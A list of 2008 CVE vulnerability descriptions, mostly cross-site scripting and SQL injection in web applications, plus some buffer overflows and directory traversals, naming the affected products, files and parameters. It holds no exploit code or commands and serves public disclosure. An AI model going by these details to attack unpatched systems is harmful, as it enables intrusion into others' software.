[CVE-2008-4408] Cross-site scripting (XSS) vulnerability in MediaWiki 1.13.1, 1.12.0, and possibly other versions before 1.13.2 allows remote attackers to inject arbitrary web script or HTML via the useskin parameter to an unspecified component.
[CVE-2008-4397] Directory traversal vulnerability in the RPC interface (asdbapi.dll) in CA ARCserve Backup (formerly BrightStor ARCserve Backup) r11.1 through r12.0 allows remote attackers to execute arbitrary commands via a .. (dot dot) in an RPC call with opnum 0x10A.
[CVE-2008-4393] Cross-site scripting (XSS) vulnerability in VeriSign Kontiki Delivery Management System (DMS) 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the action parameter to zodiac/servlet/zodiac.
[CVE-2008-4391] Stack-based buffer overflow in the SetSource method in the NetCamPlayerWeb11gv2 ActiveX control in NetCamPlayerWeb11gv2.ocx on the Cisco Linksys WVC54GC wireless video camera before firmware 1.25 allows remote attackers to execute arbitrary code via long invalid arguments.
[CVE-2008-4385] Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs by specifying a malicious website argument to the Init method in (1) a certain ActiveX control (sysreqlab2.cab, sysreqlab.dll, sysreqlabsli.dll, or sysreqlab2.dll) and (2) a certain Java applet in RLApplet.class in sysreqlab2.jar or sysreqlab.jar.
[CVE-2008-4383] Stack-based buffer overflow in the Agranet-Emweb embedded management web server in Alcatel OmniSwitch OS7000, OS6600, OS6800, OS6850, and OS9000 Series devices with AoS 5.1 before 5.1.6.463.R02, 5.4 before 5.4.1.429.R01, 6.1.3 before 6.1.3.965.R01, 6.1.5 before 6.1.5.595.R01, and 6.3 before 6.3.1.966.R01 allows remote attackers to execute arbitrary code via a long Session cookie.
[CVE-2008-4379] Cross-site scripting (XSS) vulnerability in report.php in Mr. CGI Guy Hot Links SQL-PHP 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-4372] Cross-site scripting (XSS) vulnerability in articles.php in AvailScript Article Script allows remote attackers to inject arbitrary web script or HTML via the aIDS parameter.
[CVE-2008-4370] Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php.
[CVE-2008-4365] Cross-site scripting (XSS) vulnerability in search.php in Siteman 1.1.11 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
[CVE-2008-4364] SQL injection vulnerability in default.aspx in ParsaGostar ParsaWeb CMS allows remote attackers to execute arbitrary SQL commands via the (1) id parameter in the "page" page and (2) txtSearch parameter in the "Search" page.
[CVE-2008-4349] Multiple cross-site scripting (XSS) vulnerabilities in news.php in s0nic Paranews 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) id or (2) page parameter in a details action.
[CVE-2008-4345] SQL injection vulnerability in download.php in WebPortal CMS 0.7.4 and earlier allows remote attackers to execute arbitrary SQL commands via the aid parameter.
[CVE-2008-4337] Cross-site scripting (XSS) vulnerability in Bitweaver 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the URL parameter to (1) edit.php and (2) list.php in articles/
[CVE-2008-4336] Cross-site scripting (XSS) vulnerability in album.php in Atomic Photo Album (APA) 1.1.0pre4 allows remote attackers to inject arbitrary web script or HTML via the apa_album_ID parameter.
[CVE-2008-4333] Cross-site scripting (XSS) vulnerability in PHP infoBoard V.7 Plus allows remote attackers to inject arbitrary web script or HTML via the isname parameter in a newtopic action.
[CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237.
[CVE-2008-4324] The user interface event dispatcher in Mozilla Firefox 3.0.3 on Windows XP SP2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a series of keypress, click, onkeydown, onkeyup, onmousedown, and onmouseup events. NOTE: it was later reported that Firefox 3.0.2 on Mac OS X 10.5 is also affected.
[CVE-2008-4320] Multiple cross-site scripting (XSS) vulnerabilities in OpenNMS before 1.5.94 allow remote attackers to inject arbitrary web script or HTML via (1) the j_username parameter to j_acegi_security_check, (2) the username parameter to notification/list.jsp, and (3) the filter parameter to event/list.
[CVE-2008-4310] httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat Enterprise Linux 4 and 5, allows remote attackers to cause a denial of service (CPU consumption) via a crafted HTTP request. NOTE: this issue exists because of an incomplete fix for CVE-2008-3656.
[CVE-2008-4297] Mercurial before 1.0.2 does not enforce the allowpull permission setting for a pull operation from hgweb, which allows remote attackers to read arbitrary files from a repository via an "hg pull" request.
[CVE-2008-4294] IBM Tivoli Netcool/Webtop 2.1 before 2.1.0.5 preserves cached user privileges after logout, which allows physically proximate attackers to hijack a session by visiting an unattended workstation, as demonstrated by a root session that is still valid after a subsequent read-only session has begun.
[CVE-2008-4285] Unspecified vulnerability in the Performance Monitoring Infrastructure (PMI) feature in the Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.19, when a component statistic is enabled, allows attackers to cause a denial of service (daemon crash) via vectors related to "a gradual degradation in performance."
[CVE-2008-4284] Open redirect vulnerability in the ibm_security_logout servlet in IBM WebSphere Application Server (WAS) 5.1.1.19 and earlier 5.x versions, 6.0.x before 6.0.2.33, and 6.1.x before 6.1.0.23 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the logoutExitPage feature.
[CVE-2008-4283] CRLF injection vulnerability in the WebContainer component in IBM WebSphere Application Server (WAS) 5.1.1.19 and earlier 5.1.x versions allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.
[CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability."
[CVE-2008-4259] Microsoft Internet Explorer 7 sometimes attempts to access uninitialized memory locations, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, related to a WebDAV request for a file with a long name, aka "HTML Objects Memory Corruption Vulnerability."
[CVE-2008-4247] ftpd in OpenBSD 4.3, FreeBSD 7.0, NetBSD 4.0, Solaris, and possibly other operating systems interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
[CVE-2008-4243] Directory traversal vulnerability in ImageServer (aka UTImageServer) in WebAdmin before 1.7 for Epic Games Unreal Tournament 3 (UT3) 1.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
[CVE-2008-4232] Safari in Apple iPhone OS 2.0 through 2.1 and iPhone OS for iPod touch 2.1 through 2.1 does not restrict an IFRAME's content display to the boundaries of the IFRAME, which allows remote attackers to spoof a user interface via a crafted HTML document.
[CVE-2008-4215] Weblog in Mac OS X Server 10.4.11 does not properly check an error condition when a weblog posting access control list is specified for a user that has multiple short names, which might allow attackers to bypass intended access restrictions.
[CVE-2008-4200] Opera before 9.52 does not ensure that the address field of a news feed represents the feed's actual URL, which allows remote attackers to change this field to display the URL of a page containing web script controlled by the attacker.
[CVE-2008-4199] Opera before 9.52 does not prevent use of links from web pages to feed source files on the local disk, which might allow remote attackers to determine the validity of local filenames via vectors involving "detection of JavaScript events and appropriate manipulation."
[CVE-2008-4196] Cross-site scripting (XSS) vulnerability in Opera before 9.52 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4195] Opera before 9.52 does not properly restrict the ability of a framed web page to change the address associated with a different frame, which allows remote attackers to trigger the display of an arbitrary address in a frame via unspecified use of web script.
[CVE-2008-4186] SQL injection vulnerability in index.php in webCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id_doc parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4185] SQL injection vulnerability in index.php in webCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id parameter in a documentos action, a different vector than CVE-2008-3213.
[CVE-2008-4184] Cross-site scripting (XSS) vulnerability in index.php in webCMS Portal Edition allows remote attackers to inject arbitrary web script or HTML via the patron parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4183] IntegraMOD 1.4.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup via a direct request to a backup/backup-yyyy-dd-mm.sql filename.
[CVE-2008-4182] Cross-site scripting (XSS) vulnerability in imp/test.php in Horde Turba Contact Manager H3 2.2.1 and other versions before 2.3.1, and possibly other Horde Project products, allows remote attackers to inject arbitrary web script or HTML via the User field in an IMAP session.
[CVE-2008-4179] Multiple cross-site scripting (XSS) vulnerabilities in NooMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) page_id parameter to smileys.php and the (2) q parameter to search.php.
[CVE-2008-4174] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dynamic MP3 Lister 2.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) currentpath, (2) invert, (3) search, and (4) sort parameters.
[CVE-2008-4168] Cross-site scripting (XSS) vulnerability in verify_login.jsp in Pro2col Stingray FTS allows remote attackers to inject arbitrary web script or HTML via the form_username parameter (aka user name field).
[CVE-2008-4162] Open redirect vulnerability in admin/auth.php in NooMS 1.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the g_site_url parameter.
[CVE-2008-4154] SQL injection vulnerability in living-e webEdition CMS allows remote attackers to execute arbitrary SQL commands via the we_objectID parameter.
[CVE-2008-4152] Cross-site scripting (XSS) vulnerability in the Talk module 5.x before 5.x-1.3 and 6.x before 6.x-1.5, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via a node title.
[CVE-2008-4149] Cross-site scripting (XSS) vulnerability in the Greg Holsclaw Link to Us module 5.x before 5.x-1.1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via the "Link page header" field.
[CVE-2008-4147] Cross-site scripting (XSS) vulnerability in the Mailsave module 5.x before 5.x-3.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an attached file that has a modified Content-Type.
[CVE-2008-4146] Addalink 1.0 beta 4 and earlier allows remote attackers to (1) approve web-site additions via a modified approved field and (2) change the visit-counter value via a modified counter field.
[CVE-2008-4141] Multiple PHP remote file inclusion vulnerabilities in x10Media x10 Automatic MP3 Script 1.5.5 allow remote attackers to execute arbitrary PHP code via a URL in the web_root parameter to (1) includes/function_core.php and (2) templates/layout_lyrics.php.
[CVE-2008-4140] Cross-site scripting (XSS) vulnerability in admin.php in Quick.Cart 3.1 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2008-4139] Cross-site scripting (XSS) vulnerability in admin.php in OpenSolution Quick.Cms.Lite 2.1 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2008-4133] The web proxy service on the D-Link DIR-100 with firmware 1.12 and earlier does not properly filter web requests with large URLs, which allows remote attackers to bypass web restriction filters.
[CVE-2008-4130] Cross-site scripting (XSS) vulnerability in Gallery 2.x before 2.2.6 allows remote attackers to inject arbitrary web script or HTML via a crafted Flash animation, related to the ability of the animation to "interact with the embedding page."
[CVE-2008-4121] Multiple cross-site scripting (XSS) vulnerabilities in cpCommerce before 1.2.4 allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter in a search.quick action to search.php and (2) the name parameter in a sendtofriend action to sendtofriend.php.
[CVE-2008-4120] Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.804 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) pass parameter to login.php, or the (3) name parameter to contact.php.
[CVE-2008-4119] Multiple cross-site scripting (XSS) vulnerabilities in CA Service Desk 11.2 and CMDB 11.0 through 11.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "multiple web forms."
[CVE-2008-4118] Cross-site scripting (XSS) vulnerability in High Norm Sound Master 2nd 1.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4117] Unspecified vulnerability in a web page in the PRM module in Sun Management Center (SunMC) 3.6.1 and 4.0 allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors.
[CVE-2008-4116] Buffer overflow in Apple QuickTime 7.5.5 and iTunes 8.0 allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long type attribute in a quicktime tag (1) on a web page or embedded in a (2) .mp4 or (3) .mov file, possibly related to the Check_stack_cookie function and an off-by-one error that leads to a heap-based buffer overflow.
[CVE-2008-4111] Unspecified vulnerability in Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 and 6.1 before 6.1.0.19, when the FileServing feature is enabled, has unknown impact and attack vectors.
[CVE-2008-4104] Multiple open redirect vulnerabilities in Joomla! 1.5 before 1.5.7 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a "passed in" URL.
[CVE-2008-4096] libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
[CVE-2008-4091] SQL injection vulnerability in index.php in Web Directory Script 1.5.3 allows remote attackers to execute arbitrary SQL commands via the site parameter in an open action.
[CVE-2008-4089] Cross-site scripting (XSS) vulnerability in print.php in myPHPNuke (MPN) before 1.8.8_8rc2 allows remote attackers to inject arbitrary web script or HTML via the sid parameter.
[CVE-2008-4083] Cross-site scripting (XSS) vulnerability in the Bookmarks plugin in Brim 2.0 allows remote authenticated users to inject arbitrary web script or HTML via the name parameter in an addItemPost action to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-4076] Cross-site scripting (XSS) vulnerability in (1) Tor World Tor Board 1.3 and earlier, (2) Topics BBS 1.11 and earlier, (3) Simple BBS 1.86 and earlier, and (4) Interactive BBS 1.57 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-0917.
[CVE-2008-4056] Cross-site scripting (XSS) vulnerability in admin/login.php in Matterdaddy Market 1.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4053] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the Bluemoon PopnupBLOG module 3.20 and 3.30 for XOOPS allow remote attackers to inject arbitrary web script or HTML via the (1) param, (2) cat_id, and (3) view parameters.
[CVE-2008-4051] Cross-site scripting (XSS) vulnerability in surveyresults.asp in Smart Survey 1.0 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4045] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 5.42 allow remote attackers to inject arbitrary web script or HTML via the (1) file and (2) HelpFile parameters to parse.php, the (3) Folder and (4) start parameters to showmail.php, and the (5) abookview parameter to abook.php.
[CVE-2008-4033] Cross-domain vulnerability in Microsoft XML Core Services 3.0 through 6.0, as used in Microsoft Expression Web, Office, Internet Explorer, and other products, allows remote attackers to obtain sensitive information from another domain and corrupt the session state via HTTP request header fields, as demonstrated by the Transfer-Encoding field, aka "MSXML Header Request Vulnerability."
[CVE-2008-4020] Cross-site scripting (XSS) vulnerability in Microsoft Office XP SP3 allows remote attackers to inject arbitrary web script or HTML via a document that contains a "Content-Disposition: attachment" header and is accessed through a cdo: URL, which renders the content instead of raising a File Download dialog box, aka "Vulnerability in Content-Disposition Header Vulnerability."
[CVE-2008-4013] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2008-4012] Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite WLW 8.1SP5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI pageflows."
[CVE-2008-4011] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote authenticated users to affect integrity via unknown vectors.
[CVE-2008-4010] Unspecified vulnerability in the WebLogic Workshop component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to "some NetUI tags."
[CVE-2008-4009] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.1, when configuring multiple authorizers, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
[CVE-2008-3968] Cross-site scripting (XSS) vulnerability in userlist.php in PunBB before 1.2.20 allows remote attackers to inject arbitrary web script or HTML via the p parameter.
[CVE-2008-3966] Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via (1) a certain referrer field in usercp2.php, (2) a certain location field in inc/functions_online.php, and certain (3) tsubject and (4) psubject fields in moderation.php.
[CVE-2008-3950] Off-by-one error in the _web_drawInRect:withFont:ellipsis:alignment:measureOnly function in WebKit in Safari in Apple iPhone 1.1.4 and 2.0 and iPod touch 1.1.4 and 2.0 allows remote attackers to cause a denial of service (browser crash) via a JavaScript alert call with an argument that lacks breakable characters and has a length that is a multiple of the memory page size, leading to an out-of-bounds read.
[CVE-2008-3941] Cross-site scripting (XSS) vulnerability in BizDirectory 2.04 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter in a search action to the default URI.
[CVE-2008-3937] Multiple cross-site scripting (XSS) vulnerabilities in Open Media Collectors Database (OpenDb) 1.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) user_id parameter in an edit action to user_admin.php, the (2) title parameter to listings.php, and the (3) redirect_url parameter to user_profile.php.
[CVE-2008-3935] Cross-site scripting (XSS) vulnerability in DIC shop_v50 3.0 and earlier and shop_v52 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3926] Multiple directory traversal vulnerabilities in Content Management Made Easy (CMME) 1.12 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the env parameter in a weblog action to index.php, or (2) create arbitrary directories via a .. (dot dot) in the env parameter in a login action to admin.php.
[CVE-2008-3924] The "Make a backup" functionality in Content Management Made Easy (CMME) 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover (1) account names and (2) password hashes via a direct request for (a) backup/cmme_data.zip or (b) backup/cmme_cmme.zip. NOTE: it was later reported that vector a also affects CMME 1.19.
[CVE-2008-3923] Multiple cross-site scripting (XSS) vulnerabilities in statistics.php in Content Management Made Easy (CMME) 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) year parameters in an hstat_year action.
[CVE-2008-3921] Multiple cross-site scripting (XSS) vulnerabilities in AWStats Totals 1.0 through 1.14 allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters.
[CVE-2008-3917] Cross-site scripting (XSS) vulnerability in index.php in Ovidentia 6.6.5 allows remote attackers to inject arbitrary web script or HTML via the field parameter in a search action.
[CVE-2008-3906] CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the query string.
[CVE-2008-3886] Multiple cross-site scripting (XSS) vulnerabilities in index.php in dotProject 2.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the inactive parameter in a tasks action, (2) the date parameter in a calendar day_view action, (3) the callback parameter in a public calendar action, or (4) the type parameter in a ticketsmith action.
[CVE-2008-3884] Cross-site scripting (XSS) vulnerability in Blogn (BURO GUN) 1.9.7 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2006-6176.
[CVE-2008-3881] Multiple cross-site scripting (XSS) vulnerabilities in ZoneMinder 1.23.3 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified "zm_html_view_*.php" files.
[CVE-2008-3874] Cross-site scripting (XSS) vulnerability in account.php in Lussumo Vanilla 1.1.5-rc1, 1.1.4, and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Value field (aka Label ==> Value pairs). NOTE: some of these details are obtained from third party information.
[CVE-2008-3860] Multiple cross-site scripting (XSS) vulnerabilities (1) in the WYSIWYG editors, (2) during local group creation, (3) during HTML redirects, (4) in the HTML import, (5) in the Rich text editor, and (6) in link-page in IBM Lotus Quickr 8.1 services for Lotus Domino before Hotfix 15 allow remote attackers to inject arbitrary web script or HTML via unknown vectors, including (7) the Imported Page. NOTE: the vulnerability in the WYSIWYG editors may exist because of an incomplete fix for CVE-2008-2163.
[CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html.
[CVE-2008-3849] Cross-site scripting (XSS) vulnerability in the calendar controller in Civic Website Manager before 1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving (1) month, (2) day, and (3) year fields.
[CVE-2008-3847] Multiple cross-site scripting (XSS) vulnerabilities in AN Guestbook (ANG) before 0.7.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3846] Cross-site scripting (XSS) vulnerability in mysql-lists 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3841] Cross-site scripting (XSS) vulnerability in admin/search_links.php in Freeway eCommerce 1.4.1.171 allows remote attackers to inject arbitrary web script or HTML via the search_link parameter.
[CVE-2008-3824] Cross-site scripting (XSS) vulnerability in (1) Text_Filter/Filter/xss.php in Horde 3.1.x before 3.1.9 and 3.2.x before 3.2.2 and (2) externalinput.php in Popoon r22196 and earlier allows remote attackers to inject arbitrary web script or HTML by using / (slash) characters as replacements for spaces in an HTML e-mail message.
[CVE-2008-3823] Cross-site scripting (XSS) vulnerability in MIME/MIME/Contents.php in the MIME library in Horde 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via the filename of a MIME attachment in an e-mail message.
[CVE-2008-3821] Multiple cross-site scripting (XSS) vulnerabilities in the HTTP server in Cisco IOS 11.0 through 12.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the ping program or (2) unspecified other aspects of the URI.
[CVE-2008-3787] SQL injection vulnerability in listing_view.php in Web Directory Script 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the name parameter.
[CVE-2008-3786] Cross-site scripting (XSS) vulnerability in index.php in PICTURESPRO Photo Cart 3.9 allows remote attackers to inject arbitrary web script or HTML via the qtitle parameter (aka "Gallery or event name" field) in a search action.
[CVE-2008-3782] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in ACG-PTP 1.0.6 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) Category name field under Advertisement Packages, the (2) Reason field under Credit/Debit Users, and the (3) FAQ question and (4) FAQ answer fields under Add New FAQ Entry.
[CVE-2008-3781] Cross-site scripting (XSS) vulnerability in GMOD GBrowse before 1.69 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3779] Cross-site scripting (XSS) vulnerability in search/index.php in Five Star Review Script allows remote attackers to inject arbitrary web script or HTML via the words parameter in a search action.
[CVE-2008-3778] The remote management interface in SIP Enablement Services (SES) Server in Avaya SIP Enablement Services 5.0, and Communication Manager (CM) 5.0 on the S8300C with SES enabled, proceeds with Core router updates even when a login is invalid, which allows remote attackers to cause a denial of service (messaging outage) or gain privileges via an update request.
[CVE-2008-3776] Directory traversal vulnerability in Fujitsu Web-Based Admin View 2.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2008-3773] Cross-site scripting (XSS) vulnerability in vBulletin 3.7.2 PL1 and 3.6.10 PL3, when "Show New Private Message Notification Pop-Up" is enabled, allows remote authenticated users to inject arbitrary web script or HTML via a private message subject (aka newpm[title]).
[CVE-2008-3771] Cross-site scripting (XSS) vulnerability in members.php in Pars4u Videosharing 1 allows remote attackers to inject arbitrary web script or HTML via the PageNo parameter.
[CVE-2008-3768] Multiple SQL injection vulnerabilities in class.ajax.php in Turnkey Web Tools SunShop Shopping Cart before 4.1.5 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter in an edit_registry action to index.php, (2) a vector involving the check_email function, and other vectors.
[CVE-2008-3758] Multiple cross-site scripting (XSS) vulnerabilities in Lussumo Vanilla 1.1.4 and earlier (1) allow remote attackers to inject arbitrary web script or HTML via the NewPassword parameter to people.php, and allow remote authenticated users to inject arbitrary web script or HTML via the (2) Account picture and (3) Icon fields in account.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-3741] The private filesystem in Drupal 5.x before 5.10 and 6.x before 6.4 trusts the MIME type sent by a web browser, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks by uploading files containing arbitrary web script or HTML.
[CVE-2008-3740] Cross-site scripting (XSS) vulnerability in the output filter in Drupal 5.x before 5.10 and 6.x before 6.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3739] Cross-site scripting (XSS) vulnerability in (1) System Consultants La!Cooda WIZ 1.4.0 and earlier and (2) SpaceTag LacoodaST 2.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving upload of files containing XSS sequences.
[CVE-2008-3738] Session fixation vulnerability in SpaceTag LacoodaST 2.1.3 and earlier allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2008-3735] Cross-site scripting (XSS) vulnerability in index.php in PHPizabi before 848 Core HotFix Pack 3 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a blogs.search action.
[CVE-2008-3730] Cross-site scripting (XSS) vulnerability in Nordicwind Document Management System (NOAH) before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3729] Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to bypass authentication and obtain administrative access via a direct request with (1) an IsAdmin=true cookie value or (2) no cookie.
[CVE-2008-3728] Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to determine the installation path, IP addresses, and error messages via direct requests to files under LOG/.
[CVE-2008-3727] Directory traversal vulnerability in Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2008-3726] Cross-site scripting (XSS) vulnerability in Web Based Administration in MicroWorld Technologies MailScan 5.6.a espatch 1 allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2008-3715] Cross-site scripting (XSS) vulnerability in inc-core-admin-editor-previouscolorsjs.php in the FlexCMS 2.5 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the PreviousColorsString parameter.
[CVE-2008-3714] Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows remote attackers to inject arbitrary web script or HTML via the query_string, a different vulnerability than CVE-2006-3681 and CVE-2006-1945.
[CVE-2008-3712] Multiple cross-site scripting (XSS) vulnerabilities in Mambo 4.6.2 and 4.6.5, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) query string to mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php and the (2) mosConfig_sitename parameter to administrator/popups/index3pop.php.
[CVE-2008-3709] Multiple cross-site scripting (XSS) vulnerabilities in CyBoards PHP Lite 1.21 allow remote attackers to inject arbitrary web script or HTML via the (1) lOptionsOptions, (2) lNavAdminOptions, or (3) lNavReturn parameter to options.php
[CVE-2008-3700] Multiple cross-site scripting (XSS) vulnerabilities in Kayako SupportSuite 3.20.02 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the sessionid parameter in a livesupport startclientchat action to visitor/index.php
[CVE-2008-3683] Unspecified vulnerability in the FTP subsystem in Sun Java System Web Proxy Server 4.0 through 4.0.5 before SP6 allows remote attackers to cause a denial of service (failure to accept connections) via unknown vectors, probably related to exhaustion of file descriptors.
[CVE-2008-3679] Multiple cross-site scripting (XSS) vulnerabilities in index.php in IDevSpot PhpLinkExchange 1.01 allow remote attackers to inject arbitrary web script or HTML via the catid parameter in a (1) user_add, (2) recip, (3) tellafriend, or (4) contact action, or (5) in a request without an action
[CVE-2008-3678] Cross-site scripting (XSS) vulnerability in admin/search_links.php in Freeway before 1.4.2.197 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2008-3669] SQL injection vulnerability in comments.php in ZeeScripts Reviews Opinions Rating Posting Engine Web-Site PHP Script (aka ZeeReviews) allows remote attackers to execute arbitrary SQL commands via the ItemID parameter.
[CVE-2008-3668] Multiple cross-site scripting (XSS) vulnerabilities in the Yogurt Social Network module 3.2 rc1 for XOOPS allow remote attackers to inject arbitrary web script or HTML via the uid parameter to (1) friends.php, (2) seutubo.php, (3) album.php, (4) scrapbook.php, (5) index.php, or (6) tribes.php
